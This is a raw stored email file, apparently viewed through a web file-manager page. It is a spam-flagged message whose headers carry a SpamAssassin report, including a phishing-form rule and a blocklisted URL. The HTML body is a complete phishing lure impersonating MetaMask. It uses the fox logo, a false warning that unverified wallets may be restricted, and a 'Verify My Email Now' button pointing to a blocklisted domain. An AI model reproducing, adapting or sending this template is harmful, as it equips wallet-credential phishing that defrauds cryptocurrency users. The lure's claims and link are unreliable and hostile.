OwlCyberSecurity - MANAGER
Edit File: 1736744369.M537792P336269.premium128.web-hosting.com,S=7135,W=7306:2,
Return-Path: <postmaster@e2230fe1ed.nxcli.io> Delivered-To: contact+spam@gourayafroid.com Received: from premium128.web-hosting.com by premium128.web-hosting.com with LMTP id MNEHH7GdhGeNIQUAAvhI2g (envelope-from <postmaster@e2230fe1ed.nxcli.io>) for <contact+spam@gourayafroid.com>; Sun, 12 Jan 2025 23:59:29 -0500 Return-path: <postmaster@e2230fe1ed.nxcli.io> Envelope-to: contact@gourayafroid.com Delivery-date: Sun, 12 Jan 2025 23:59:29 -0500 Received: from cloudhost-1945881.nl-west-1.nxcli.net ([185.145.13.67]:37976) by premium128.web-hosting.com with esmtps (TLS1.2) tls TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 (Exim 4.96.2) (envelope-from <postmaster@e2230fe1ed.nxcli.io>) id 1tXCXs-001RpB-0v for contact@gourayafroid.com; Sun, 12 Jan 2025 23:59:29 -0500 Received: (qmail 5741 invoked by uid 10149); 13 Jan 2025 04:42:30 +0000 Date: 13 Jan 2025 04:42:30 +0000 Message-ID: <20250113044230.5731.qmail@cloudhost-1945881.nl-west-1.nxcli.net> To: contact@gourayafroid.com X-PHP-Originating-Script: 10149:mail.php From: Account Assistance <126704cbf4ff48b9b385b63343a00ca9@secure.wallet-notices.com> Reply-To: no-reply@example.com Content-Type: text/html; charset=UTF-8 X-Mailer-ID: 678499b66a3b2 X-Origin-IP: 192.168.1.73 X-Message-ID: 2502818163c619e1fcd1c0cf8f5c041d X-Origin-Time: 2025-01-13 04:42:30 X-Campaign-ID: 9d8bc572489782ae List-Unsubscribe: <mailto:unsubscribe@example.com> X-Spam-Status: Yes, score=5.3 X-Spam-Score: 53 X-Spam-Bar: +++++ X-Spam-Report: Spam detection software, running on the system "premium128.web-hosting.com", has identified this incoming email as possible spam. The original message has been attached to this so you can view it or label similar future email. If you have any questions, see root\@localhost for details. Content preview: Verify Email Secure Your Wallet by Verifying Your Email Dear User, Content analysis details: (5.3 points, 5.0 required) pts rule name description ---- ---------------------- -------------------------------------------------- 0.0 URIBL_BLOCKED ADMINISTRATOR NOTICE: The query to URIBL was blocked. See http://wiki.apache.org/spamassassin/DnsBlocklists#dnsbl-block for more information. [URIs: wikimedia.org] 1.9 URIBL_ABUSE_SURBL Contains an URL listed in the ABUSE SURBL blocklist [URIs: decyphernyc.net] 0.6 FROM_STARTS_WITH_NUMS From: starts with several numbers 0.3 FROM_LOCAL_HEX From: localpart has long hexadecimal sequence 0.0 RCVD_IN_VALIDITY_RPBL_BLOCKED RBL: ADMINISTRATOR NOTICE: The query to Validity was blocked. See https://knowledge.validity.com/hc/en-us/articles/20961730681243 for more information. [185.145.13.67 listed in bl.score.senderscore.com] 0.0 RCVD_IN_VALIDITY_SAFE_BLOCKED RBL: ADMINISTRATOR NOTICE: The query to Validity was blocked. See https://knowledge.validity.com/hc/en-us/articles/20961730681243 for more information. [185.145.13.67 listed in sa-trusted.bondedsender.org] 0.2 HEADER_FROM_DIFFERENT_DOMAINS From and EnvelopeFrom 2nd level mail domains are different 0.8 DKIM_ADSP_NXDOMAIN No valid author signature and domain not in DNS 0.0 HTML_MESSAGE BODY: HTML included in message 0.1 MIME_HTML_ONLY BODY: Message only has text/html MIME parts 0.0 HTML_IMAGE_ONLY_32 BODY: HTML: images with 2800-3200 bytes of words 0.1 MIME_HEADER_CTYPE_ONLY 'Content-Type' found without required MIME headers 1.0 KAM_LAZY_DOMAIN_SECURITY Sending domain does not have any anti-forgery methods 0.0 KAM_DMARC_STATUS Test Rule for DKIM or SPF Failure with Strict Alignment 0.2 URI_PHISH Phishing using web form X-Spam-Flag: YES Subject: ***SPAM*** =?UTF-8?B?VmVyaWZ5IFlvdXIgRW1haWwgdG8gU2VjdXJlIFlvdXIgV2FsbGV0?= <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Verify Email</title> <style> body { font-family: Arial, sans-serif; background-color: #f4f4f4; margin: 0; padding: 0; color: #333; } .container { max-width: 600px; margin: 20px auto; background: #ffffff; border: 1px solid #ddd; border-radius: 8px; overflow: hidden; } .header { background-color: #0073e6; color: #ffffff; text-align: center; padding: 20px 0; } .header img { max-width: 80px; /* Reduced size */ height: auto; } .content { padding: 20px; line-height: 1.6; } .content h1 { color: #0073e6; font-size: 24px; margin: 0 0 20px; } .content p { margin-bottom: 20px; } .cta-button { display: inline-block; padding: 12px 24px; color: #ffffff; background-color: #0073e6; text-decoration: none; border-radius: 4px; font-size: 16px; } .footer { background-color: #f4f4f4; text-align: center; padding: 10px; font-size: 12px; color: #666; } .footer a { color: #0073e6; text-decoration: none; } </style> </head> <body> <div class="container"> <div class="header"> <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/3/36/MetaMask_Fox.svg/1200px-MetaMask_Fox.svg.png" alt="Logo"> </div> <div class="content"> <h1>Secure Your Wallet by Verifying Your Email</h1> <p>Dear User,</p> <p>Our system has detected that your email is not associated with your wallet account. To maintain security and access, please verify your email address immediately.</p> <p>⚠️ Note: Wallets without active email verification and 2FA may be restricted.</p> <a href="https://decyphernyc.net/mt?id=-1233644457704766190-8637" class="cta-button">Verify My Email Now</a> <p>If you have already verified your email, please ignore this message.</p> <p>Thank you,<br>The Support Team</p> </div> <div class="footer"> <p>This is an automated message. Please do not reply.</p> <p>© 2025. All rights reserved.</p> </div> </div> </body> </html> <!-- Random-ID: 678499b66a3be -->